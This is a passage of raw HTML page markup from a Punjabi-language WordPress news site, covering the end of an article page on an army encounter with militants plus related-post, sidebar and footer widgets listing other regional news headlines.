	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://charhdikala.com/?p=6178&amp;media=http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_14_38_307620000mko-ll.jpg&description=%E0%A9%9E%E0%A9%8C%E0%A8%9C+%E0%A8%B5%E0%A9%B1%E0%A8%B2%E0%A9%8B%E0%A8%82+2+%E0%A8%AE%E0%A9%81%E0%A8%95%E0%A8%BE%E0%A8%AC%E0%A8%B2%E0%A8%BF%E0%A8%86%E0%A8%82+%E2%80%98%E0%A8%9A+5+%E0%A8%85%E0%A8%A4%E0%A8%BF%E0%A8%B5%E0%A8%BE%E0%A8%A6%E0%A9%80+%E0%A8%A2%E0%A9%87%E0%A8%B0" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=%E0%A9%9E%E0%A9%8C%E0%A8%9C+%E0%A8%B5%E0%A9%B1%E0%A8%B2%E0%A9%8B%E0%A8%82+2+%E0%A8%AE%E0%A9%81%E0%A8%95%E0%A8%BE%E0%A8%AC%E0%A8%B2%E0%A8%BF%E0%A8%86%E0%A8%82+%E2%80%98%E0%A8%9A+5+%E0%A8%85%E0%A8%A4%E0%A8%BF%E0%A8%B5%E0%A8%BE%E0%A8%A6%E0%A9%80+%E0%A8%A2%E0%A9%87%E0%A8%B0 - http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://charhdikala.com/?p=6178&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://charhdikala.com/?p=6178" data-text="ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#8216;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://charhdikala.com/?p=6175">ਪੰਜਾਬ ਨਗਰ-ਨਿਗਮ ਚੋਣਾਂ 17 ਦਸੰਬਰ ਨ</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="http://charhdikala.com/?p=6181">ਸੁਖਪਾਲ ਖਹਿਰਾ ਪੁੱਜੇ ਸੁਪਰੀਮ ਕੋਰਟ, ਅੱਜ ਹੋ ਸਕਦੀ ਹੈ ਸੁਣਵਾਈ</a></div></div></div>            <div class="author-box-wrap"><a itemprop="author" href="http://charhdikala.com/?author=1"><img alt='' src='http://2.gravatar.com/avatar/5f1dcab4605142041395fb38029e34f0?s=96&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/5f1dcab4605142041395fb38029e34f0?s=192&amp;d=mm&amp;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a itemprop="author" href="http://charhdikala.com/?author=1">admin</a></span></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-11-30T16:59:15+00:00"><meta itemprop="headline " content="ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#039;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_14_38_307620000mko-ll.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_1_5a214cb8e03b2 = new tdBlock();
block_td_uid_1_5a214cb8e03b2.id = "td_uid_1_5a214cb8e03b2";
block_td_uid_1_5a214cb8e03b2.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"td_uid_1_5a214cb8e03b2_rand","td_column_number":3,"live_filter_cur_post_id":6178,"live_filter_cur_post_author":"1"}';
block_td_uid_1_5a214cb8e03b2.td_column_number = "3";
block_td_uid_1_5a214cb8e03b2.block_type = "td_block_related_posts";
block_td_uid_1_5a214cb8e03b2.post_count = "3";
block_td_uid_1_5a214cb8e03b2.found_posts = "851";
block_td_uid_1_5a214cb8e03b2.header_color = "";
block_td_uid_1_5a214cb8e03b2.ajax_pagination_infinite_stop = "";
block_td_uid_1_5a214cb8e03b2.max_num_pages = "284";
tdBlocksArray.push(block_td_uid_1_5a214cb8e03b2);
</script><div class="td_block_wrap td_block_related_posts td_uid_1_5a214cb8e03b2_rand td_with_ajax_pagination td-pb-border-top"><h4 class="td-related-title"><a id="td_uid_2_5a214cb8e4515" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_1_5a214cb8e03b2" href="#">RELATED ARTICLES</a><a id="td_uid_3_5a214cb8e4558" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_1_5a214cb8e03b2" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_1_5a214cb8e03b2 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://charhdikala.com/?p=6199" rel="bookmark" title="ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_17_47_352310000sss4-ll-218x150.jpg" alt="" title="ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ"/></a></div>                <a href="http://charhdikala.com/?cat=6" class="td-post-category">Breaking News</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=6199" rel="bookmark" title="ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ">ਅਮਰੀਕਾ &#8216;ਚ ਪਹਿਲੀ ਸਿੱਖ ਮਹਿਲਾ ਬਣੀ ਮੇਅਰ</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://charhdikala.com/?p=6196" rel="bookmark" title="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/11/DSC_0726-218x150.jpg" alt="" title="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ"/></a></div>                <a href="http://charhdikala.com/?cat=6" class="td-post-category">Breaking News</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=6196" rel="bookmark" title="ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ">ਨਜਾਇਜ਼ ਨੀਲੇ ਕਾਰਡ ਅਤੇ ਗਲਤ ਬੁਢਾਪਾ ਪੈਨਸ਼ਨਾਂ ਲਗਾਉਣ ਵਾਲੇ ਅਫ਼ਸਰ ਬਖ਼ਸ਼ੇ ਨਹੀਂ ਜਾਣਗੇ: ਧਰਮਸੋਤ</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://charhdikala.com/?p=6193" rel="bookmark" title="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/11/MURDER-CASE-580x395-218x150.jpg" alt="" title="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ"/></a></div>                <a href="http://charhdikala.com/?cat=6" class="td-post-category">Breaking News</a>            </div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=6193" rel="bookmark" title="ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ">ਵਿਪਨ ਸ਼ਰਮਾ ਦੀ ਹੱਤਿਆ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਦੋ ਦੋਸ਼ੀ ਕਾਬੂ</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5a214cb8e03b2" data-td_block_id="td_uid_1_5a214cb8e03b2"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5a214cb8e03b2" data-td_block_id="td_uid_1_5a214cb8e03b2"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
        
            <div class="td-comments-title-wrap ">
                <h4 class="block-title"><span>NO COMMENTS</span></h4>
            </div>

            				<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/?p=6178#respond" style="display:none;">Cancel reply</a></small></h3>				<form action="http://charhdikala.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
					<div class="clearfix"></div>
				<p class="comment-form-input-wrap">
					<textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
		        </p><p class="comment-form-input-wrap">
			            <span class="comment-req-wrap">
			            	<input class="" id="author" name="author" placeholder="Name:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <span class="comment-req-wrap"><input class="" id="email" name="email" placeholder="Email:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='6178' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="5d280df9ef" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="37"/></p>				</form>
					</div><!-- #respond -->
		    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td-a-rec td-a-rec-id-sidebar "><span class="td-adspot-title">- Advertisement -</span><div class="td-all-devices"><a href="#"><img src="http://charhdikala.com/wp-content/uploads/2016/04/rec300.jpg"/></a></div></div><script>var block_td_uid_4_5a214cb8ecfc9 = new tdBlock();
block_td_uid_4_5a214cb8ecfc9.id = "td_uid_4_5a214cb8ecfc9";
block_td_uid_4_5a214cb8ecfc9.atts = '{"sort":"random_posts","custom_title":"LATEST NEWS","limit":"3","header_color":"","class":"td_block_widget td_uid_4_5a214cb8ecfc9_rand"}';
block_td_uid_4_5a214cb8ecfc9.td_column_number = "1";
block_td_uid_4_5a214cb8ecfc9.block_type = "td_block_18";
block_td_uid_4_5a214cb8ecfc9.post_count = "3";
block_td_uid_4_5a214cb8ecfc9.found_posts = "1944";
block_td_uid_4_5a214cb8ecfc9.header_color = "";
block_td_uid_4_5a214cb8ecfc9.ajax_pagination_infinite_stop = "";
block_td_uid_4_5a214cb8ecfc9.max_num_pages = "648";
tdBlocksArray.push(block_td_uid_4_5a214cb8ecfc9);
</script><div class="td_block_wrap td_block_18 td_block_widget td_uid_4_5a214cb8ecfc9_rand td-pb-border-top"><h4 class="block-title"><span>LATEST NEWS</span></h4><div id=td_uid_4_5a214cb8ecfc9 class="td_block_inner td-column-1">
        <div class="td_module_mx8 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="meta-info-container">
                <div class="td-module-thumb"><a href="http://charhdikala.com/?p=2685" rel="bookmark" title="ਬਜਟ ਇਜਲਾਸ-2017 ਦੀ ਸ਼ੁਰੂਆਤ ਨੋਟਬੰਦੀ ਤੇ ਸਰਜੀਕਲ ਸਟਰਾਈਕ ਵੱਡੇ ਕਦਮ : ਰਾਸ਼ਟਰਪਤੀ"><img width="500" height="357" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/01/2017_1image_13_33_104190000vw-ll.jpg" alt="" title="ਬਜਟ ਇਜਲਾਸ-2017 ਦੀ ਸ਼ੁਰੂਆਤ ਨੋਟਬੰਦੀ ਤੇ ਸਰਜੀਕਲ ਸਟਰਾਈਕ ਵੱਡੇ ਕਦਮ : ਰਾਸ਼ਟਰਪਤੀ"/></a></div>
                <div class="td-module-meta-info">
                    <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=2685" rel="bookmark" title="ਬਜਟ ਇਜਲਾਸ-2017 ਦੀ ਸ਼ੁਰੂਆਤ ਨੋਟਬੰਦੀ ਤੇ ਸਰਜੀਕਲ ਸਟਰਾਈਕ ਵੱਡੇ ਕਦਮ : ਰਾਸ਼ਟਰਪਤੀ">ਬਜਟ ਇਜਲਾਸ-2017 ਦੀ ਸ਼ੁਰੂਆਤ ਨੋਟਬੰਦੀ ਤੇ ਸਰਜੀਕਲ ਸਟਰਾਈਕ ਵੱਡੇ ਕਦਮ : ਰਾਸ਼ਟਰਪਤੀ</a></h3>                                        <span class="td-author-date">
                        <div class="td-post-author-name"><a itemprop="author" href="http://charhdikala.com/?author=1">admin</a> <span>-</span> </div>                        <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-01-31T16:25:58+00:00" >January 31, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                        <div class="td-module-comments"><a href="http://charhdikala.com/?p=2685#respond">0</a></div>                    </span>
                </div>
            </div>

            <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-01-31T16:25:58+00:00"><meta itemprop="headline " content="ਬਜਟ ਇਜਲਾਸ-2017 ਦੀ ਸ਼ੁਰੂਆਤ ਨੋਟਬੰਦੀ ਤੇ ਸਰਜੀਕਲ ਸਟਰਾਈਕ ਵੱਡੇ ਕਦਮ : ਰਾਸ਼ਟਰਪਤੀ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/01/2017_1image_13_33_104190000vw-ll.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

            <div class="td-module-thumb"><a href="http://charhdikala.com/?p=4748" rel="bookmark" title="ਹੁਣ ਪੰਜਾਬ &#8216;ਚ ਅਧਿਆਪਕ ਰੋਕਣਗੇ ਕਿਸਾਨਾਂ ਨੂੰ ਪਰਾਲੀ ਸਾੜਨ ਤੋਂ"><img width="80" height="60" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/09/crop-residue-burning-580x395-80x60.jpg" alt="" title="ਹੁਣ ਪੰਜਾਬ &#8216;ਚ ਅਧਿਆਪਕ ਰੋਕਣਗੇ ਕਿਸਾਨਾਂ ਨੂੰ ਪਰਾਲੀ ਸਾੜਨ ਤੋਂ"/></a></div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=4748" rel="bookmark" title="ਹੁਣ ਪੰਜਾਬ &#8216;ਚ ਅਧਿਆਪਕ ਰੋਕਣਗੇ ਕਿਸਾਨਾਂ ਨੂੰ ਪਰਾਲੀ ਸਾੜਨ ਤੋਂ">ਹੁਣ ਪੰਜਾਬ &#8216;ਚ ਅਧਿਆਪਕ ਰੋਕਣਗੇ ਕਿਸਾਨਾਂ ਨੂੰ ਪਰਾਲੀ ਸਾੜਨ ਤੋਂ</a></h3>                <div class="td-module-meta-info">
                                                            <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-09-30T16:58:46+00:00" >September 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                                    </div>
            </div>
            <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-09-30T16:58:46+00:00"><meta itemprop="headline " content="ਹੁਣ ਪੰਜਾਬ &#039;ਚ ਅਧਿਆਪਕ ਰੋਕਣਗੇ ਕਿਸਾਨਾਂ ਨੂੰ ਪਰਾਲੀ ਸਾੜਨ ਤੋਂ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/09/crop-residue-burning-580x395.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

            <div class="td-module-thumb"><a href="http://charhdikala.com/?p=4616" rel="bookmark" title="ਸਰਕਾਰ ਵੱਲੋਂ ਪਰਾਲੀ ਸਾੜਨ ਦੀ ਸਮੱਸਿਆ ਨੂੰ ਨੱਥ ਪਾਉਣ ਲਈ ਕਾਰਜ ਯੋਜਨਾ ਤਿਆਰ"><img width="80" height="60" itemprop="image" class="entry-thumb" src="http://charhdikala.com/wp-content/uploads/2017/09/Amrinder-singh-1-80x60.jpg" alt="" title="ਸਰਕਾਰ ਵੱਲੋਂ ਪਰਾਲੀ ਸਾੜਨ ਦੀ ਸਮੱਸਿਆ ਨੂੰ ਨੱਥ ਪਾਉਣ ਲਈ ਕਾਰਜ ਯੋਜਨਾ ਤਿਆਰ"/></a></div>
            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=4616" rel="bookmark" title="ਸਰਕਾਰ ਵੱਲੋਂ ਪਰਾਲੀ ਸਾੜਨ ਦੀ ਸਮੱਸਿਆ ਨੂੰ ਨੱਥ ਪਾਉਣ ਲਈ ਕਾਰਜ ਯੋਜਨਾ ਤਿਆਰ">ਸਰਕਾਰ ਵੱਲੋਂ ਪਰਾਲੀ ਸਾੜਨ ਦੀ ਸਮੱਸਿਆ ਨੂੰ ਨੱਥ ਪਾਉਣ ਲਈ ਕਾਰਜ ਯੋਜਨਾ ਤਿਆਰ</a></h3>                <div class="td-module-meta-info">
                                                            <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-09-27T17:04:38+00:00" >September 27, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                                    </div>
            </div>
            <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-09-27T17:04:38+00:00"><meta itemprop="headline " content="ਸਰਕਾਰ ਵੱਲੋਂ ਪਰਾਲੀ ਸਾੜਨ ਦੀ ਸਮੱਸਿਆ ਨੂੰ ਨੱਥ ਪਾਉਣ ਲਈ ਕਾਰਜ ਯੋਜਨਾ ਤਿਆਰ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/09/Amrinder-singh-1.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        </div></div> <!-- ./block --><script>var block_td_uid_5_5a214cb9050d7 = new tdBlock();
block_td_uid_5_5a214cb9050d7.id = "td_uid_5_5a214cb9050d7";
block_td_uid_5_5a214cb9050d7.atts = '{"sort":"random_posts","custom_title":"MUST READ","limit":"3","header_color":"","ajax_pagination":"load_more","class":"td_block_widget td_uid_5_5a214cb9050d7_rand"}';
block_td_uid_5_5a214cb9050d7.td_column_number = "1";
block_td_uid_5_5a214cb9050d7.block_type = "td_block_9";
block_td_uid_5_5a214cb9050d7.post_count = "3";
block_td_uid_5_5a214cb9050d7.found_posts = "1944";
block_td_uid_5_5a214cb9050d7.header_color = "";
block_td_uid_5_5a214cb9050d7.ajax_pagination_infinite_stop = "";
block_td_uid_5_5a214cb9050d7.max_num_pages = "648";
tdBlocksArray.push(block_td_uid_5_5a214cb9050d7);
</script><div class="td_block_wrap td_block_9 td_block_widget td_uid_5_5a214cb9050d7_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><span>MUST READ</span></h4><div id=td_uid_5_5a214cb9050d7 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_8 td_module_wrap" itemscope itemtype="http://schema.org/Article">

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=4453" rel="bookmark" title="ਦਿੱਲੀ &#8216;ਚ ਵਿਅਕਤੀ ਨੂੰ ਸਿਗਰਟ ਪੀਣ ਤੋਂ ਰੋਕਣ ਕਾਰਨ ਮਾਰੇ ਗਏ ਗੁਰਪ੍ਰੀਤ ਸਿੰਘ ਦਾ ਬਠਿੰਡਾ &#8216;ਚ ਸਸਕਾਰ">ਦਿੱਲੀ &#8216;ਚ ਵਿਅਕਤੀ ਨੂੰ ਸਿਗਰਟ ਪੀਣ ਤੋਂ ਰੋਕਣ ਕਾਰਨ ਮਾਰੇ ਗਏ ਗੁਰਪ੍ਰੀਤ ਸਿੰਘ ਦਾ...</a></h3>
                <div class="td-module-meta-info">
                                        <div class="td-post-author-name"><a itemprop="author" href="http://charhdikala.com/?author=1">admin</a> <span>-</span> </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-09-21T17:34:57+00:00" >September 21, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-module-comments"><a href="http://charhdikala.com/?p=4453#respond">0</a></div>                </div>
            </div>

            
            <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-09-21T17:34:57+00:00"><meta itemprop="headline " content="ਦਿੱਲੀ &#039;ਚ ਵਿਅਕਤੀ ਨੂੰ ਸਿਗਰਟ ਪੀਣ ਤੋਂ ਰੋਕਣ ਕਾਰਨ ਮਾਰੇ ਗਏ ਗੁਰਪ੍ਰੀਤ ਸਿੰਘ ਦਾ ਬਠਿੰਡਾ &#039;ਚ ਸਸਕਾਰ"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_8 td_module_wrap" itemscope itemtype="http://schema.org/Article">

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=2090" rel="bookmark" title="ਸੁਖਬੀਰ ਸਿੰਘ ਬਾਦਲ ਨੇ ਨੀਂਹ ਪੱਥਰ ਲਾਉਣ ਤੋਂ ਇਲਾਵਾ ਕੁਝ ਨਹੀਂ ਕੀਤਾ : ਜਾਖੜ">ਸੁਖਬੀਰ ਸਿੰਘ ਬਾਦਲ ਨੇ ਨੀਂਹ ਪੱਥਰ ਲਾਉਣ ਤੋਂ ਇਲਾਵਾ ਕੁਝ ਨਹੀਂ ਕੀਤਾ : ਜਾਖੜ</a></h3>
                <div class="td-module-meta-info">
                                        <div class="td-post-author-name"><a itemprop="author" href="http://charhdikala.com/?author=1">admin</a> <span>-</span> </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-12-20T08:43:32+00:00" >December 20, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-module-comments"><a href="http://charhdikala.com/?p=2090#respond">0</a></div>                </div>
            </div>

            
            <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2016-12-20T08:43:32+00:00"><meta itemprop="headline " content="ਸੁਖਬੀਰ ਸਿੰਘ ਬਾਦਲ ਨੇ ਨੀਂਹ ਪੱਥਰ ਲਾਉਣ ਤੋਂ ਇਲਾਵਾ ਕੁਝ ਨਹੀਂ ਕੀਤਾ : ਜਾਖੜ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2016/12/2016_12image_00_19_40041000019abhh13-ll.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_8 td_module_wrap" itemscope itemtype="http://schema.org/Article">

            <div class="item-details">
                <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://charhdikala.com/?p=5344" rel="bookmark" title="ਪਰਾਲੀ ਸਾੜਨ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਐਨ. ਜੀ. ਟੀ. ਵੱਲੋਂ ਕੇਂਦਰ ਨੂੰ ਨੋਟਿਸ ਜਾਰੀ">ਪਰਾਲੀ ਸਾੜਨ ਦੇ ਮਾਮਲੇ &#8216;ਚ ਐਨ. ਜੀ. ਟੀ. ਵੱਲੋਂ ਕੇਂਦਰ ਨੂੰ ਨੋਟਿਸ ਜਾਰੀ</a></h3>
                <div class="td-module-meta-info">
                                        <div class="td-post-author-name"><a itemprop="author" href="http://charhdikala.com/?author=1">admin</a> <span>-</span> </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-10-30T17:33:07+00:00" >October 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-module-comments"><a href="http://charhdikala.com/?p=5344#respond">0</a></div>                </div>
            </div>

            
            <meta itemprop="author" content = "admin"><meta itemprop="datePublished" content="2017-10-30T17:33:07+00:00"><meta itemprop="headline " content="ਪਰਾਲੀ ਸਾੜਨ ਦੇ ਮਾਮਲੇ &#039;ਚ ਐਨ. ਜੀ. ਟੀ. ਵੱਲੋਂ ਕੇਂਦਰ ਨੂੰ ਨੋਟਿਸ ਜਾਰੀ"><meta itemprop="image" content="http://charhdikala.com/wp-content/uploads/2017/10/2017_10image_15_50_368390000parali-ll.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" id="next-page-td_uid_5_5a214cb9050d7" data-td_block_id="td_uid_5_5a214cb9050d7">Load more<i class="td-icon-font td-icon-menu-down"></i></a></div></div> <!-- ./block -->                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <script>var block_td_uid_6_5a214cb90d65b = new tdBlock();
block_td_uid_6_5a214cb90d65b.id = "td_uid_6_5a214cb90d65b";
block_td_uid_6_5a214cb90d65b.atts = '{"custom_title":"EDITOR PICKS","limit":3,"sort":"featured","class":"td_uid_6_5a214cb90d65b_rand"}';
block_td_uid_6_5a214cb90d65b.td_column_number = "1";
block_td_uid_6_5a214cb90d65b.block_type = "td_block_7";
block_td_uid_6_5a214cb90d65b.post_count = "3";
block_td_uid_6_5a214cb90d65b.found_posts = "1944";
block_td_uid_6_5a214cb90d65b.header_color = "";
block_td_uid_6_5a214cb90d65b.ajax_pagination_infinite_stop = "";
block_td_uid_6_5a214cb90d65b.max_num_pages = "648";
tdBlocksArray.push(block_td_uid_6_5a214cb90d65b);
</script><div class="td_block_wrap td_block_7 td_uid_6_5a214cb90d65b_rand td-pb-border-top"><h4 class="block-title"><span>EDITOR PICKS</span></h4><div id=td_uid_6_5a214cb90d65b class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

